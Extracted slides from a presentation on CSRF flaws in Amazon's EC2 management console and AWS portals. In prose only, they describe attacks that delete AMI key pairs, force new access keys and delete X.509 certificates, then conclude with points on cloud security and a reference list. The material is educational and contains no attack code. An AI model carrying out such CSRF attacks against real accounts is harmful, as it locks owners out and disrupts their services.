  • 23. Web management console vulnerabilities • The last vulnerability involves the deletion of AMI key pairs. • Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim’s EC2 session. If the key pair is deleted, and the user has not properly backed up the key pair, he will have lost access to his own AMIs!
  • 24. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 25. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates
  • 26. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates.
  • 27. AWS portals vulnerabilities • The first attack against AWS generates a new access key for the EC2 user’s session. • Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user’s account. • The attacker can create a temporary denial of service as the administrator must now update all the applications utilizing access key authentication to use the newly generated key.
  • 28. AWS portals vulnerabilities • This next attack forcibly deletes any X.509 certificates previously generated by the EC2 user. • Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with the newly generated certificates.
  • 29. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 30. Conclusions • Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users. • But it does not magically protect application logic from abuse or prevent attacks against the application level.
  • 31. Conclusions • Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines. • Cloud providers must fix their security bugs and perform an incessant code review.
  • 32. References • Hacking: the Next Generation Nitesh Dhanjani, Billy Rios, and Brett Hardin. O’Reilly, 2009. • Hacking Exposed: Web 2.0 Rich Cannings, Himanshu Dwivedi, Zane Lackey. Mc-Graw Hill, 2008 • Secure Programming with Static Analysis Brian Chess, Jacob West. Addison-Wesley, 2007.